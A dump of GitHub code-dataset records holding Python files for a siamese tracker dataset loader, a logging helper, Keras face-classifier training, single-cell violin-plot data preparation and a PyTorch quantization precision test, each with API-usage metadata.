template_resize_arr.shape[0] / 2)\n x1 = int(background_arr.shape[1] / 2 - template_resize_arr.shape[1] / 2)\n y2 = int(y1 + template_resize_arr.shape[0])\n x2 = int(x1 + template_resize_arr.shape[1])\n background_arr[y1:y2, x1:x2] = template_resize_arr\n\n b = Image.fromarray(background_arr.astype(np.uint8))\n if not os.path.exists(path):\n os.mkdir(path)\n outpath = os.path.join(path, save_name + '.bmp')\n b.save(outpath)\n\nif __name__ == '__main__':\n\n siammask = siammask_data('train')\n siammask.template_all()", "repo_name": "juzisedefeimao/cv", "sub_path": "lib/datasets/siammask.py", "file_name": "siammask.py", "file_ext": "py", "file_size_in_byte": 14000, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "lib.datasets.imdb.imdb", "line_number": 17, "usage_type": "name"}, {"api_name": "lib.datasets.imdb.imdb.__init__", "line_number": 19, "usage_type": "call"}, {"api_name": "lib.datasets.imdb.imdb", "line_number": 19, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg.SIAMSE", "line_number": 25, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg", "line_number": 25, "usage_type": "name"}, {"api_name": "lib.networks.netconfig.cfg.SIAMSE", "line_number": 26, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg", "line_number": 26, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "lib.networks.netconfig.cfg.SIAMSE", "line_number": 52, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg", "line_number": 52, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg.SIAMSE", "line_number": 92, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg", "line_number": 92, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 107, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 113, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 113, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 125, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 125, "usage_type": "name"}, {"api_name": "lib.networks.netconfig.cfg.SIAMSE", "line_number": 147, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg", "line_number": 147, "usage_type": "name"}, {"api_name": "lib.networks.netconfig.cfg.SIAMSE", "line_number": 156, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg", "line_number": 156, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 162, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.uint16", "line_number": 168, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 169, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 170, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 171, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 172, "usage_type": "attribute"}, {"api_name": "scipy.sparse.sparse.csr_matrix", "line_number": 174, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse", "line_number": 174, "usage_type": "attribute"}, {"api_name": "scipy.sparse", "line_number": 174, "usage_type": "name"}, {"api_name": "numpy.random.permutation", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 192, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 218, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path", "line_number": 235, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 240, "usage_type": "call"}, {"api_name": "os.path", "line_number": 240, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 241, "usage_type": "call"}, {"api_name": "os.path", "line_number": 241, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 243, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 253, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 253, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 263, "usage_type": "call"}, {"api_name": "os.path", "line_number": 263, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 264, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 264, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.uint16", "line_number": 285, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 293, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 293, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 293, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 298, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 303, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 303, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 313, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 313, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 314, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 314, "usage_type": "name"}, {"api_name": "lib.networks.netconfig.cfg.SIAMSE", "line_number": 314, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg", "line_number": 314, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 316, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 325, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 325, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 325, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 326, "usage_type": "call"}, {"api_name": "os.path", "line_number": 326, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 332, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 334, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg.SIAMSE", "line_number": 335, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg", "line_number": 335, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 338, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 338, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 349, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 349, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 350, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 350, "usage_type": "name"}, {"api_name": "lib.networks.netconfig.cfg.SIAMSE", "line_number": 350, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg", "line_number": 350, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 352, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 361, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 361, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 361, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 362, "usage_type": "call"}, {"api_name": "os.path", "line_number": 362, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 363, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 364, "usage_type": "call"}, {"api_name": "os.path", "line_number": 364, "usage_type": "attribute"}]} +{"seq_id": "19821833789", "text": "#!/usr/bin/env python3\n#\n# (c) 2019 Yoichi Tanibayashi\n#\n\"\"\"\nMyLogger.py\n\nUsage:\n\n--\nfrom MyLogger import get_logger\n\nclass A:\n def __init__(self, a, debug=False)\n self.debug = debug\n self.logger = get_logger(__class__.__name__, self.debug)\n self.logger.debug('a=%s', a)\n--\n\n\"\"\"\n__author__ = 'Yoichi Tanibayashi'\n__date__ = '2019'\n\nfrom logging import getLogger, StreamHandler, Formatter, DEBUG, INFO, WARN\n\n\nclass MyLogger:\n def __init__(self, name=''):\n fmt_hdr = '%(asctime)s %(levelname)s '\n fmt_loc = '%(filename)s.%(name)s.%(funcName)s:%(lineno)d> '\n self.handler_fmt = Formatter(fmt_hdr + fmt_loc + '%(message)s',\n datefmt='%H:%M:%S')\n\n self.console_handler = StreamHandler()\n self.console_handler.setLevel(DEBUG)\n self.console_handler.setFormatter(self.handler_fmt)\n\n self.logger = getLogger(name)\n self.logger.setLevel(INFO)\n self.logger.addHandler(self.console_handler)\n self.logger.propagate = False\n\n def get_logger(self, name, debug):\n logger = self.logger.getChild(name)\n if debug:\n logger.setLevel(DEBUG)\n else:\n logger.setLevel(INFO)\n return logger\n\n\nmyLogger = MyLogger()\n\n\ndef get_logger(name, debug):\n return myLogger.get_logger(name, debug)\n", "repo_name": "ytani01/OledServer", "sub_path": "MyLogger.py", "file_name": "MyLogger.py", "file_ext": "py", "file_size_in_byte": 1352, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.Formatter", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 35, "usage_type": "argument"}, {"api_name": "logging.getLogger", "line_number": 38, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 39, "usage_type": "argument"}, {"api_name": "logging.DEBUG", "line_number": 46, "usage_type": "argument"}, {"api_name": "logging.INFO", "line_number": 48, "usage_type": "argument"}]} +{"seq_id": "6789644767", "text": "import models\nimport load_lfw as load\nimport sys\nimport os\nimport keras\nimport sys\n\nimport keras.backend as K\n\n# Important global data\nclasses = ['Other', 'Halle Berry']\nK.set_learning_phase(0)\n\n# Grab training/testing data\nnorm_freq = load.normalize_frequencies_function(num_classes=2)\nX_train, y_train = load.get_dataset('/home/jspringer/Workspace/hb/dataset/train', preprocessing=[norm_freq, load.shuffle])\nX_test, y_test = load.get_dataset('/home/jspringer/Workspace/hb/dataset/test')\ny_train = keras.utils.to_categorical(y_train, num_classes=2)\ny_test = keras.utils.to_categorical(y_test, num_classes=2)\n\ndatagen = keras.preprocessing.image.ImageDataGenerator(\n rotation_range=10.0,\n width_shift_range=0.25,\n height_shift_range=0.25,\n channel_shift_range=0.2,\n shear_range=5.0,\n zoom_range=0.1,\n horizontal_flip=True)\ndatagen.fit(X_train)\n\nadam_params = { 'lr': 1e-5, 'decay': 1e-7 }\n\nmodelset = [\n# models.HB_ResNet50(adam_params=adam_params),\n# models.HB_InceptionV3(adam_params=adam_params),\n# models.HB_VGG16(adam_params=adam_params),\n# models.HB_MobileNetV2(adam_params=adam_params),\n models.HB_DenseNet121(adam_params=adam_params)\n]\n\nfor model in modelset:\n print('Pre-training {}'.format(type(model).__name__))\n model.train(X_train, y_train, \n generator=datagen, \n validation_data=(X_test, y_test),\n epochs=5,\n shuffle=True,\n save_on_best=False,\n pretraining_stage=True)\n\n print('Training {}'.format(type(model).__name__))\n model.train(X_train, y_train,\n generator=datagen,\n validation_data=(X_test, y_test),\n shuffle=True,\n save_on_best=True,\n epochs=75,\n pretraining_stage=False)\n print()\n", "repo_name": "jakespringer/LCAHalleBerry", "sub_path": "analysis/deep-models/halleberry/train-all.py", "file_name": "train-all.py", "file_ext": "py", "file_size_in_byte": 1840, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "keras.backend.set_learning_phase", "line_number": 12, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 12, "usage_type": "name"}, {"api_name": "load_lfw.normalize_frequencies_function", "line_number": 15, "usage_type": "call"}, {"api_name": "load_lfw.get_dataset", "line_number": 16, "usage_type": "call"}, {"api_name": "load_lfw.shuffle", "line_number": 16, "usage_type": "attribute"}, {"api_name": "load_lfw.get_dataset", "line_number": 17, "usage_type": "call"}, {"api_name": "keras.utils.to_categorical", "line_number": 18, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 18, "usage_type": "attribute"}, {"api_name": "keras.utils.to_categorical", "line_number": 19, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 19, "usage_type": "attribute"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 21, "usage_type": "call"}, {"api_name": "keras.preprocessing", "line_number": 21, "usage_type": "attribute"}, {"api_name": "models.HB_DenseNet121", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "70505990885", "text": "#!/bin/python\n\nimport sys\nimport os\nimport json\nimport csv\nimport itertools\nimport loompy\nimport numpy as np\n\nimport helper\n\nfileName = \"normalized_counts.loom\"\n\ncolour_counter = 0\n\ndef add_barcode(plotly_obj, label, barcode, expression_values):\n\t\"\"\" add the barcode+expression to an exisiting group or make a new one in the plotly object \"\"\"\n\tfor group in plotly_obj:\n\t\tif group['name'] == label:\n\t\t\tgroup['x'].append(label)\n\t\t\tgroup['y'].append(expression_values[barcode])\n\t\t\treturn\n\n\t# label not seen yet, create new group\n\tplotly_obj.append(new_violin_group(label, expression_values[barcode]))\n\treturn\n\ndef label_with_groups(plotly_obj, expression_values, group, labels_tsv):\n\t# label each barcode with its chosen group\n\tlabel_idx = labels_tsv[0].index(str(group))\n\tgroup_type = labels_tsv[1][label_idx]\n\tall_barcodes = {key: True for key in expression_values.keys()}\n\tif group_type == 'group':\n\t\tfor row in labels_tsv[2:]:\n\t\t\tbarcode = str(row[0])\n\t\t\tif all_barcodes.pop(barcode, None):\n\t\t\t\t# only add barcodes that exist in expressions dictionary\n\t\t\t\tlabel = str(row[label_idx])\n\t\t\t\tadd_barcode(plotly_obj, label, barcode, expression_values)\n\t\t# now add the remaining barcodes without a label\n\t\tfor barcode in all_barcodes.keys():\n\t\t\tlabel = 'unlabeled'\n\t\t\tadd_barcode(plotly_obj, label, barcode, expression_values)\n\telif group_type == 'numeric':\n\t\t# can't do this for violins\n\t\thelper.return_error(group + \" is numeric data, not viewable in violin plots\")\n\telse:\n\t\thelper.return_error(group + \" does not have a valid data type (must be 'group')\")\n\n\treturn plotly_obj\n\ndef sort_barcodes(opacities, group, runID):\n\t\"\"\" given the opacities for the barcodes, sorts them into the specified groups and returns a plotly object \"\"\"\n\tplotly_obj = []\n\t\n\tpath = \"/usr/src/app/results/{runID}/SEURAT/frontend_groups/groups.tsv\".format(runID=runID)\n\tif not os.path.isfile(path):\n\t\t# try command-line path\n\t\tpath = \"../../results/{runID}/SEURAT/frontend_groups/groups.tsv\".format(runID=runID)\n\t\tif not os.path.isfile(path):\n\t\t\thelper.return_error(\"group label file not found (\"+path+\")\")\n\t\n\twith open(path) as group_definitions:\n\t\treader = csv.reader(group_definitions, delimiter=\"\\t\")\n\t\tavailable_groups = next(reader)[1:]\n\t\ttry:\n\t\t\tlabel_idx = available_groups.index(str(group)) + 1\n\t\texcept ValueError as e:\n\t\t\thelper.return_error(group + \" is not an available group\")\n\t\tfor row in reader:\n\t\t\tbarcode = str(row[0])\n\t\t\tlabel = str(row[label_idx])\n\t\t\tadd_barcode(plotly_obj, barcode, label, opacities)\n\n\treturn plotly_obj\n\ndef get_expression(feature, runID):\n\t\"\"\" parses the normalized count matrix to get an expression value for each barcode \"\"\"\n\tpath = \"/usr/src/app/results/{runID}/SEURAT/frontend_normalized/{fileName}\".format(runID=runID, fileName=fileName)\n\tif not os.path.isfile(path):\n\t\t# try command-line path\n\t\tpath = \"../../results/{runID}/SEURAT/frontend_normalized/{fileName}\".format(runID=runID, fileName=fileName)\n\t\tif not os.path.isfile(path):\n\t\t\thelper.return_error(\"normalized count matrix not found (\"+path+\")\")\n\n\twith loompy.connect(path) as ds:\n\t\tbarcodes = ds.ca.CellID\n\t\tfeatures = ds.ra.Gene\n\t\tfeature_idx = next((i for i in range(len(features)) if features[i] == feature), -1)\n\t\tif feature_idx >= 0:\n\t\t\tfeature_exp = [float(i) for i in ds[feature_idx, :]]\n\t\t\treturn dict(zip(barcodes, feature_exp))\n\t\telse:\n\t\t\thelper.return_error(\"Feature Not Found\")\n\n\twith open(path) as norm_counts:\n\t\treader = csv.reader(norm_counts, delimiter=\"\\t\")\n\t\tbarcodes = next(reader)\n\t\tfor row in reader:\n\t\t\tif str(row[0]) == str(feature):\n\t\t\t\tfeature_exp = [float(x) for x in row[1:]]\n\t\t\t\t# dict where barcodes are keys, opacities are values\n\t\t\t\treturn dict(zip(barcodes, feature_exp)) \n\n\thelper.return_error(\"Feature Not Found\")\n\n\n\ndef new_violin_group(label, y_coord):\n\t\"\"\" creates a new violin group for the plot \"\"\"\n\tglobal colour_counter\n\tviolin_group = {\n\t\t\"name\": label,\n\t\t\"type\": \"violin\",\n\t\t\"spanmode\": \"hard\",\n\t\t\"fillcolor\": \"\",\n\t\t\"line\": {\"color\": helper.COLOURS[colour_counter%len(helper.COLOURS)] },\n\t\t\"points\": \"jitter\",\n\t\t\"jitter\": 0.85,\n\t\t\"width\": 0.75,\n\t\t\"meanline\": {\"visible\": \"true\"},\n\t\t\"x\": [label],\n\t\t\"y\": [y_coord]\n\t}\n\tcolour_counter += 1\n\treturn violin_group\n\ndef categorize_barcodes(group, expression_values, runID, projectID):\n\t\"\"\" for every group, make a new plotly object and put the barcodes into it \"\"\"\n\tgroups_path = \"/usr/src/app/results/{runID}/SEURAT/frontend_groups/groups.tsv\".format(runID=runID)\n\tmetadata_path = \"/usr/src/app/minio/upload/project-{projectID}/metadata.tsv\".format(projectID=projectID) # optional, user-defined\n\tif not os.path.isfile(groups_path):\n\t\t# try command-line path\n\t\tgroups_path = \"../../results/{runID}/SEURAT/frontend_groups/groups.tsv\".format(runID=runID)\n\t\tmetadata_path = \"../../minio/upload/project-{projectID}/metadata.tsv\".format(projectID=projectID) # optional\n\t\tif not os.path.isfile(groups_path):\n\t\t\thelper.return_error(\"group label file not found (\"+groups_path+\")\")\n\n\t# store the file(s) in 2d lists\n\tgroups_tsv = [line.rstrip('\\n').split('\\t') for line in open(groups_path)]\n\tmetadata_tsv = [line.rstrip('\\n').split('\\t') for line in open(metadata_path)] if os.path.isfile(metadata_path) else []\n\n\tplotly_obj = []\n\tif group in groups_tsv[0]:\n\t\t# groups tsv definition supercedes metadata\n\t\tlabel_with_groups(plotly_obj, expression_values, group, groups_tsv)\n\telif group in metadata_tsv[0]:\n\t\t# it's defined in the metadata\n\t\tlabel_with_groups(plotly_obj, expression_values, group, metadata_tsv)\n\telse:\n\t\thelper.return_error(group + \" is not an available group in groups.tsv or metadata.tsv\")\n\n\treturn plotly_obj\n\n\ndef calculate_bandwidths(plotly_obj):\n\t\"\"\" all expression values now recorded, calculate bandwidths and display violins with null bandwidths as boxplots \"\"\"\n\tfor violin_group in plotly_obj:\n\t\ty_values = violin_group['y']\n\t\t#print(y_values.count(0.0)/float(len(y_values))*100)\n\t\tif sum(y_values) == 0.0:\n\t\t\tviolin_group['type'] = 'box'\n\t\telse:\n\t\t\t# replace 0s with 0.1 for kernel density estimate (doesn't perform well on sparse data) \n\t\t\tmod_values = [0.1 if val == 0.0 else val for val in y_values]\n\t\t\t# calculate Silverman's Rule of Thumb\tfor bandwidth\n\t\t\tiqr = np.subtract(*np.percentile(mod_values, [75,25]))\n\t\t\tstd = np.std(mod_values)\n\t\t\tviolin_group['bandwidth'] = 0.9 * min(std, iqr/1.34) * (len(mod_values)**(-1/5.0))\n\n\treturn\n\ndef get_violin_data(group, feature, runID, projectID):\n\t\"\"\" given a grouping for the cells and a feature of interest, returns the plotly violin object \"\"\"\t\n\texpression_values = get_expression(feature, runID)\n\tplotly_obj = categorize_barcodes(group, expression_values, runID, projectID)\n\tcalculate_bandwidths(plotly_obj)\n\treturn plotly_obj\n\ndef main():\n\ttry:\n\t\tparams = json.loads(sys.argv[1]) # parse json inputs\n\t\tgroup, feature, runID, projectID = params['group'], params['feature'], params['runID'], params['projectID']\n\texcept Exception as e:\n\t\thelper.return_error(\"unable to read arguments: \"+str(e))\n\n\tresult = get_violin_data(group, feature, runID, projectID)\n\thelper.sort_traces(result)\n\tprint(json.dumps(result))\n\tsys.stdout.flush()\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "pughlab/crescent-frontend", "sub_path": "express/python/violin.py", "file_name": "violin.py", "file_ext": "py", "file_size_in_byte": 7106, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "52", "api": [{"api_name": "helper.return_error", "line_number": 47, "usage_type": "call"}, {"api_name": "helper.return_error", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "helper.return_error", "line_number": 62, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 65, "usage_type": "call"}, {"api_name": "helper.return_error", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "helper.return_error", "line_number": 85, "usage_type": "call"}, {"api_name": "loompy.connect", "line_number": 87, "usage_type": "call"}, {"api_name": "helper.return_error", "line_number": 95, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 98, "usage_type": "call"}, {"api_name": "helper.return_error", "line_number": 106, "usage_type": "call"}, {"api_name": "helper.COLOURS", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path", "line_number": 133, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "helper.return_error", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path", "line_number": 142, "usage_type": "attribute"}, {"api_name": "helper.return_error", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 169, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 183, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 183, "usage_type": "attribute"}, {"api_name": "helper.return_error", "line_number": 186, "usage_type": "call"}, {"api_name": "helper.sort_traces", "line_number": 189, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 190, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 191, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 191, "usage_type": "attribute"}]} +{"seq_id": "74532321124", "text": " \nimport torch\nfrom torch.ao.quantization._pt2e.quantizer import (\n ComposableQuantizer,\n DerivedQuantizationSpec,\n EmbeddingQuantizer,\n FixedQParamsQuantizationSpec,\n OperatorConfig,\n QNNPackQuantizer,\n QuantizationAnnotation,\n QuantizationSpec,\n Quantizer,\n SharedQuantizationSpec,\n)\nimport copy\nimport torch._dynamo as torchdynamo\nfrom torch.ao.quantization._quantize_pt2e import (\n _convert_to_reference_decomposed_fx,\n convert_pt2e,\n prepare_pt2e_quantizer,\n prepare_qat_pt2e_quantizer,\n)\n\ntorch._dynamo.config.verbose = True\ntorch._inductor.config.trace.enabled = True\ntorch._inductor.config.trace.debug_log = True\ntorch._inductor.config.debug = True\ntorch._inductor.config.verbose_progress = True\nfrom torch._inductor.compile_fx import compile_fx\n\nimport numpy as np\nimport random\nimport torch.utils._pytree as pytree\nimport torch.fx._pytree as fx_pytree\nfrom torch.utils._pytree import (\n tree_flatten,\n tree_map,\n tree_unflatten,\n TreeSpec,\n LeafSpec,\n pytree_to_str,\n str_to_pytree,\n)\n\nlocal_seed = 2023\ntorch.manual_seed(local_seed) # Set PyTorch seed\nnp.random.seed(seed=local_seed) # Set Numpy seed\nrandom.seed(local_seed) # Set the Python seed\n\ndef test():\n class M(torch.nn.Module):\n def __init__(self,):\n super().__init__()\n\n def forward(self, x, y):\n # arg0, arg1, = fx_pytree.tree_flatten_spec(([x, y], {}), self._in_spec)\n arg0, arg1, = x, y\n quantize_per_tensor_default = torch.ops.quantized_decomposed.quantize_per_tensor(arg0, 0.02003643848001957, 130, 0, 255, torch.uint8); arg0 = None\n quantize_per_tensor_default_1 = torch.ops.quantized_decomposed.quantize_per_tensor(arg1, 0.021639926359057426, 138, 0, 255, torch.uint8); arg1 = None\n _to_copy_default = torch.ops.aten._to_copy.default(quantize_per_tensor_default, dtype = torch.int32); quantize_per_tensor_default = None\n _to_copy_default_1 = torch.ops.aten._to_copy.default(quantize_per_tensor_default_1, dtype = torch.int32); quantize_per_tensor_default_1 = None\n div_tensor = torch.ops.aten.div.Tensor(0.02003643848001957, 0.03313786908984184)\n sub_tensor = torch.ops.aten.sub.Tensor(_to_copy_default, 130); _to_copy_default = None\n mul_tensor = torch.ops.aten.mul.Tensor(div_tensor, sub_tensor); div_tensor = sub_tensor = None\n _to_copy_default_2 = torch.ops.aten._to_copy.default(mul_tensor, dtype = torch.int32); mul_tensor = None\n div_tensor_1 = torch.ops.aten.div.Tensor(0.021639926359057426, 0.03313786908984184)\n sub_tensor_1 = torch.ops.aten.sub.Tensor(_to_copy_default_1, 138); _to_copy_default_1 = None\n mul_tensor_1 = torch.ops.aten.mul.Tensor(div_tensor_1, sub_tensor_1); div_tensor_1 = sub_tensor_1 = None\n _to_copy_default_3 = torch.ops.aten._to_copy.default(mul_tensor_1, dtype = torch.int32); mul_tensor_1 = None\n add_tensor_1 = torch.ops.aten.add.Tensor(_to_copy_default_2, _to_copy_default_3); _to_copy_default_2 = _to_copy_default_3 = None\n add_tensor_2 = torch.ops.aten.add.Tensor(add_tensor_1, 133); add_tensor_1 = None\n clamp_default = torch.ops.aten.clamp.default(add_tensor_2, 0, 255); add_tensor_2 = None\n _to_copy_default_4 = torch.ops.aten._to_copy.default(clamp_default, dtype = torch.uint8); clamp_default = None\n dequantize_per_tensor_default_2 = torch.ops.quantized_decomposed.dequantize_per_tensor(_to_copy_default_4, 0.03313786908984184, 133, 0, 255, torch.uint8); _to_copy_default_4 = None\n # return pytree.tree_unflatten([dequantize_per_tensor_default_2], self._out_spec)\n return (dequantize_per_tensor_default_2, )\n\n m = M()\n example_inputs = (torch.randn(1, 3, 32), torch.randn(1, 3, 32),)\n\n\n # Calculate reference result\n pt2_quant_output = m(*example_inputs)\n\n optimized_model = compile_fx(m, example_inputs)\n print(\"first run\", flush=True)\n optimized_model(*example_inputs)\n print(\"second run\", flush=True)\n res = optimized_model(*example_inputs)\n\n print(\"res is: {}\".format(res), flush=True)\n print(\"pt2_quant_output is: {}\".format(pt2_quant_output), flush=True)\n print(torch.allclose(res[0], pt2_quant_output[0], rtol=0.01, atol=0.01), flush=True)\n \n\ndef test_torch_to_int():\n input = torch.tensor([1.27, 1.68, -1.27, -1.68], dtype=torch.float)\n print(\"input is: {}\".format(input), flush=True)\n input_int = input.to(dtype=torch.int32)\n print(\"input_int is: {}\".format(input_int), flush=True)\n\n\nif __name__ == \"__main__\":\n test()\n # test_torch_to_int()\n", "repo_name": "leslie-fang-intel/torch_script", "sub_path": "inductor/int8/test_precision_expression/test_debug_numerial_difference.py", "file_name": "test_debug_numerial_difference.py", "file_ext": "py", "file_size_in_byte": 4675, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch._dynamo", 